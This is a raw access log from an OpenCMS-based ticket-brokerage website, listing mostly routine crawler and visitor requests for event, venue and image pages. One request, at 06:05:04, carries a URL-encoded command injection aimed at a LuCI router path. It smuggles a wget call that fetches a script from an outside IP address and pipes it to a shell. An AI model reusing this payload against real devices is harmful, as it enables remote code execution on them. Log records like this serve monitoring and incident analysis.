47.128.118.177 - - [29/Jun/2024:06:01:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.118.177 - - [29/Jun/2024:06:01:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.118.177 - - [29/Jun/2024:06:02:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.118.177 - - [29/Jun/2024:06:02:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.118.177 - - [29/Jun/2024:06:02:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.118.177 - - [29/Jun/2024:06:02:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
185.169.252.159 - - [29/Jun/2024:06:02:00 +0200] "GET /ticket2/opencms/sv/login/?edid=8A4C7AC3-9F20-8E7F-3D23-EA3DFE7093D0 HTTP/1.1" 200 74250
192.95.29.138 - - [29/Jun/2024:06:02:01 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=213A241C-CBD1-63CB-002B-7734E06AD58D&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:02:03 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2&catid=95AE85B5-8979-BB11-643C-430ACC6D50F9 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:02:08 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=21AF03A2-2F1D-66D0-BFA2-40F5742741D8 HTTP/1.1" 404 -
114.119.132.248 - - [29/Jun/2024:06:02:09 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=05EDBB0A-27C1-B942-380A-AB20B03538AA HTTP/1.1" 200 86763
51.222.253.15 - - [29/Jun/2024:06:02:12 +0200] "GET /ticket2/opencms/en/venue/?venueid=94A02315-EFA8-FFDF-E832-C63DB1390DFF HTTP/1.1" 200 71384
192.95.29.138 - - [29/Jun/2024:06:02:15 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=21AF03A2-2F1D-66D0-BFA2-40F5742741D8&sortorder=desc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:06:02:15 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:06:02:16 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
114.119.153.220 - - [29/Jun/2024:06:02:22 +0200] "GET /ticket2/opencms/en/sell/?edid=7E56DA23-44A2-FB1F-17B3-AA02DF3AF2E7 HTTP/1.1" 302 -
192.95.29.138 - - [29/Jun/2024:06:02:22 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=2236E088-FD20-1D85-5B5C-965B7823FDFE&sortorder=asc&column=price HTTP/1.1" 404 -
114.119.153.220 - - [29/Jun/2024:06:02:25 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 73431
66.249.75.161 - - [29/Jun/2024:06:02:25 +0200] "GET /ticket2/opencms/dk/venue/?venueid=7F535AB1-F888-ED6B-B55A-1270FA6C3498 HTTP/1.1" 200 71797
65.108.227.178 - - [29/Jun/2024:06:02:27 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=0282D494-85AE-5A8B-2A51-BC00F5E89183 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:02:28 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=2236E088-FD20-1D85-5B5C-965B7823FDFE&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:02:30 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 404 -
47.128.124.89 - - [29/Jun/2024:06:02:32 +0200] "GET /ticket2/opencms/no/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 299529
47.128.124.89 - - [29/Jun/2024:06:02:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.124.89 - - [29/Jun/2024:06:02:33 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.124.89 - - [29/Jun/2024:06:02:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.124.89 - - [29/Jun/2024:06:02:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.124.89 - - [29/Jun/2024:06:02:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.124.89 - - [29/Jun/2024:06:02:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.124.89 - - [29/Jun/2024:06:02:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.95.29.138 - - [29/Jun/2024:06:02:35 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=2236E088-FD20-1D85-5B5C-965B7823FDFE&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:02:42 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=2236E088-FD20-1D85-5B5C-965B7823FDFE&sortorder=desc&column=section HTTP/1.1" 404 -
85.208.96.203 - - [29/Jun/2024:06:02:46 +0200] "GET /ticket2/opencms/fr/sport/billets-football/ligue_1/paris_saint_germain/ HTTP/1.1" 200 76727
192.95.29.138 - - [29/Jun/2024:06:02:49 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=225ED81D-14D9-65BF-2E7D-B99F95E4B9C3&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.118.202 - - [29/Jun/2024:06:02:54 +0200] "GET /ticket2/opencms/nl/buy/?catid=F4D223A4-C027-46DC-3DE5-726A23E30A62&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 76182
47.128.118.202 - - [29/Jun/2024:06:02:54 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.118.202 - - [29/Jun/2024:06:02:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.118.202 - - [29/Jun/2024:06:02:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.118.202 - - [29/Jun/2024:06:02:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.118.202 - - [29/Jun/2024:06:02:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.118.202 - - [29/Jun/2024:06:02:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.118.202 - - [29/Jun/2024:06:02:56 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
85.208.96.197 - - [29/Jun/2024:06:03:01 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/premier_league/brighton/ HTTP/1.1" 200 83012
192.95.29.138 - - [29/Jun/2024:06:03:02 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=225ED81D-14D9-65BF-2E7D-B99F95E4B9C3&sortorder=desc&column=row HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:03:02 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=078F99D4-0B9E-E323-5A07-D7B70F6E8874 HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:03:05 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=03CDE5C1-6C85-4333-AD6E-F14ADEB9C5AB HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:03:14 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=22918B13-E610-5B05-ADD9-C00BB91B72FA&sortorder=asc&column=section HTTP/1.1" 404 -
51.222.253.5 - - [29/Jun/2024:06:03:22 +0200] "GET /ticket2/opencms/en/buy/?page=6&comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=05A94519-01D1-C86F-9031-84936B0B9DAE HTTP/1.1" 200 73155
192.95.29.138 - - [29/Jun/2024:06:03:25 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=22A17C81-63DD-246D-25C8-9F1B0441634F HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:03:25 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=1656E964-1E02-9A38-D092-65384E60B6EA HTTP/1.1" 404 -
185.169.252.159 - - [29/Jun/2024:06:03:26 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
66.249.75.163 - - [29/Jun/2024:06:03:27 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=440CD0F5-C5B6-3E98-F49F-BD69DE8B1A85 HTTP/1.1" 200 89115
66.249.75.169 - - [29/Jun/2024:06:03:29 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/premier_league/liverpool/ HTTP/1.1" 200 84978
216.244.66.238 - - [29/Jun/2024:06:03:33 +0200] "GET /ticket2/opencms/dk/en/faq/ HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:03:37 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=25D3D3E5-D02F-8300-32F4-19219E2ACCBA&sortorder=desc&column=price HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:03:44 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=03F062B9-ACA1-F236-0E66-5FB2E8B6786E HTTP/1.1" 404 -
45.156.128.45 - - [29/Jun/2024:06:03:46 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 91946
192.95.29.138 - - [29/Jun/2024:06:03:48 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=4FCB449E-EA67-7D06-DD6A-C041E26583BB&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.58.78 - - [29/Jun/2024:06:03:50 +0200] "GET /ticket2/opencms/fi/buy/?catid=AD8E612F-0F0B-03C9-5236-E4F8B6523945&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76&page=6 HTTP/1.1" 200 76796
47.128.58.78 - - [29/Jun/2024:06:03:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187
47.128.58.78 - - [29/Jun/2024:06:03:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.58.78 - - [29/Jun/2024:06:03:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
135.181.75.58 - - [29/Jun/2024:06:03:52 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=2CCC191C-F37F-B9CA-D41C-1204E575B328 HTTP/1.1" 404 -
47.128.58.78 - - [29/Jun/2024:06:03:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.78 - - [29/Jun/2024:06:03:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.78 - - [29/Jun/2024:06:03:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.78 - - [29/Jun/2024:06:03:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.78 - - [29/Jun/2024:06:03:53 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
207.46.13.92 - - [29/Jun/2024:06:03:54 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/champions_league/real_madrid/ HTTP/1.1" 200 73545
119.8.165.166 - - [29/Jun/2024:06:03:59 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/uefa-champions-league/celtic/ HTTP/1.1" 200 73587
192.95.29.138 - - [29/Jun/2024:06:04:00 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D493DC0-3521-1F48-FB59-88048F0708BF&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:04:10 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D49B05B-F2B1-3FBA-8865-04BD3A1B16DD&sortorder=desc&column=section HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:04:12 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=2E79AED8-FF58-B4E8-AFB0-43E7CEBE7864 HTTP/1.1" 404 -
85.208.96.193 - - [29/Jun/2024:06:04:12 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/bundesliga/borussia-monchengladbach/ HTTP/1.1" 200 73113
192.95.29.138 - - [29/Jun/2024:06:04:16 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D5A9ACE-4EDC-A590-3590-39AF7C33AC8D HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:04:16 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=03F51804-8CDE-802D-E000-0AE79CB6ED35 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:04:21 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D5A9ACE-4EDC-A590-3590-39AF7C33AC8D&sortorder=desc&column=price HTTP/1.1" 404 -
51.222.253.8 - - [29/Jun/2024:06:04:27 +0200] "GET /ticket2/opencms/en/venue/?venueid=DABDC4D6-A186-DAE6-C644-5DB9CB011EEC HTTP/1.1" 200 71465
192.95.29.138 - - [29/Jun/2024:06:04:27 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D5A9ACE-4EDC-A590-3590-39AF7C33AC8D&sortorder=desc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:04:33 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D74E73C-0E56-C1EE-B9A0-852ACD0BE0AB&sortorder=desc&column=price HTTP/1.1" 404 -
65.108.227.178 - - [29/Jun/2024:06:04:33 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=043FFF0B-AAEC-B60F-6995-11630828794B HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:04:38 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=43171577-14C8-6B19-25D9-DF372BFFCBFA HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:04:38 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5D74E73C-0E56-C1EE-B9A0-852ACD0BE0AB&sortorder=desc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:04:44 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5DCA05EE-2292-263B-DA62-C2F76FFEBD2E HTTP/1.1" 404 -
47.128.63.239 - - [29/Jun/2024:06:04:46 +0200] "GET /ticket2/opencms/fi/venue/?countryid=A9198A40-C385-3F3F-F1E3-C36DF8CBA8BE HTTP/1.1" 200 102292
47.128.63.239 - - [29/Jun/2024:06:04:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.63.239 - - [29/Jun/2024:06:04:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.63.239 - - [29/Jun/2024:06:04:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.63.239 - - [29/Jun/2024:06:04:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.63.239 - - [29/Jun/2024:06:04:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.63.239 - - [29/Jun/2024:06:04:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.63.239 - - [29/Jun/2024:06:04:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.123.196 - - [29/Jun/2024:06:04:48 +0200] "GET /ticket2/opencms/fi/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 244217
47.128.123.196 - - [29/Jun/2024:06:04:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/standard.css HTTP/1.1" 200 71935
47.128.123.196 - - [29/Jun/2024:06:04:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.123.196 - - [29/Jun/2024:06:04:49 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
192.95.29.138 - - [29/Jun/2024:06:04:50 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5DCA05EE-2292-263B-DA62-C2F76FFEBD2E&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.123.196 - - [29/Jun/2024:06:04:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.123.196 - - [29/Jun/2024:06:04:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.123.196 - - [29/Jun/2024:06:04:50 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.123.196 - - [29/Jun/2024:06:04:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.123.196 - - [29/Jun/2024:06:04:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.95.29.138 - - [29/Jun/2024:06:04:55 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5DCA05EE-2292-263B-DA62-C2F76FFEBD2E&sortorder=desc&column=price HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:04:58 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=4C4DADF0-07CC-9B24-D2D9-940EF378BE99 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:01 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5DCA05EE-2292-263B-DA62-C2F76FFEBD2E&sortorder=desc&column=row HTTP/1.1" 404 -
185.191.127.212 - - [29/Jun/2024:06:05:04 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F103.149.28.141%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:07 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5DCA05EE-2292-263B-DA62-C2F76FFEBD2E&sortorder=desc&column=section HTTP/1.1" 404 -
52.167.144.222 - - [29/Jun/2024:06:05:13 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=2025 HTTP/1.1" 200 91897
65.108.227.178 - - [29/Jun/2024:06:05:15 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=044124AA-8517-9D68-740C-14F5017956EC HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:05:16 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=55D1256D-BDD9-CBA3-47A3-0A252F702555 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:18 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5F3D0AE0-EFCD-2439-F9BD-E71CF7C32617&sortorder=desc&column=row HTTP/1.1" 404 -
185.191.171.18 - - [29/Jun/2024:06:05:22 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/uefa-europa-league/ HTTP/1.1" 200 72267
192.95.29.138 - - [29/Jun/2024:06:05:23 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5F3D0AE0-EFCD-2439-F9BD-E71CF7C32617&sortorder=desc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:30 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5F5C3C79-AB0C-DE40-C11B-7D9D102A404A&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.75.161 - - [29/Jun/2024:06:05:30 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=7F3A2BCF-02DD-DC7A-AA91-1F1D8305998F HTTP/1.1" 200 88064
37.60.238.15 - - [29/Jun/2024:06:05:31 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=B0D8B10A-00EA-BE9A-51A2-1497E435E691 HTTP/1.1" 404 -
51.222.253.19 - - [29/Jun/2024:06:05:35 +0200] "GET /ticket2/opencms/dk/venue/?venueid=B8FCE929-249C-C67B-84CE-487EF2E25D2B HTTP/1.1" 200 71791
192.95.29.138 - - [29/Jun/2024:06:05:36 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5F5C3C79-AB0C-DE40-C11B-7D9D102A404A&sortorder=asc&column=row HTTP/1.1" 404 -
40.77.167.55 - - [29/Jun/2024:06:05:36 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=1B66F7E9-6D68-7258-D0DB-383034F8302F HTTP/1.1" 200 111083
85.208.96.205 - - [29/Jun/2024:06:05:40 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/la_liga/celta_vigo/ HTTP/1.1" 200 73866
65.108.227.178 - - [29/Jun/2024:06:05:40 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=04A82A7F-3526-7853-AB0E-3B58A65053A2 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:41 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5FB42A24-9598-632B-4AE7-41A2A99513C3&sortorder=desc&column=price HTTP/1.1" 404 -
47.128.125.176 - - [29/Jun/2024:06:05:42 +0200] "GET /ticket2/opencms/dk/buy/?catid=36DC4BE2-91A2-6146-2BE9-47B6F3C44EDB&comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 200 74423
47.128.125.176 - - [29/Jun/2024:06:05:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.125.176 - - [29/Jun/2024:06:05:43 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
135.181.75.58 - - [29/Jun/2024:06:05:43 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=6CD184E8-C8D4-E1CC-33D0-6F47E3751240 HTTP/1.1" 404 -
47.128.125.176 - - [29/Jun/2024:06:05:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.125.176 - - [29/Jun/2024:06:05:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.125.176 - - [29/Jun/2024:06:05:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.125.176 - - [29/Jun/2024:06:05:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.125.176 - - [29/Jun/2024:06:05:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.95.29.138 - - [29/Jun/2024:06:05:47 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=5FB42A24-9598-632B-4AE7-41A2A99513C3&sortorder=desc&column=row HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:05:52 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=60502773-C20A-1EE2-BF35-42077AC5911F&sortorder=asc&column=price HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:06:05:55 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:06:05:58 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
192.95.29.138 - - [29/Jun/2024:06:05:58 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=670DF4BD-8BFB-5FB3-6D8E-73E1D21832D7&sortorder=asc&column=row HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:06:06:01 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=B0F87075-ACFA-3C5F-D431-FC592DAB148B HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:06:02 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=757E2DFB-33DA-9B34-8402-9F06B19D8409 HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:06:04 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=671CE644-9201-9B8A-7204-3D3D5A9B0840 HTTP/1.1" 404 -
116.179.33.148 - - [29/Jun/2024:06:06:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/content/faq_en.png HTTP/1.1" 200 14226
192.95.29.138 - - [29/Jun/2024:06:06:09 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=671CE644-9201-9B8A-7204-3D3D5A9B0840&sortorder=desc&column=section HTTP/1.1" 404 -
192.95.29.138 - - [29/Jun/2024:06:06:15 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=672A3C6F-40D0-0A91-661F-3F64D5642035 HTTP/1.1" 404 -
216.244.66.238 - - [29/Jun/2024:06:06:21 +0200] "GET /ticket2/opencms/dk/en/venue/?countryid=281637B5-EBD8-5B84-5601-31AFF5C65765 HTTP/1.1" 404 -
135.181.75.58 - - [29/Jun/2024:06:06:22 +0200] "GET /ticket2/opencms/de/nl/buy/?page=6&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE&catid=7D3BEF66-5D88-3916-5B89-0E7B139E0169 HTTP/1.1" 404 -
